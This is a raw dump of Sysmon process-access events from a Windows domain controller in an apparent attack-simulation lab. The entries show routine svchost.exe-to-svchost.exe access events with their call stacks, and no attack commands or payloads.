13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.492{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.461{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 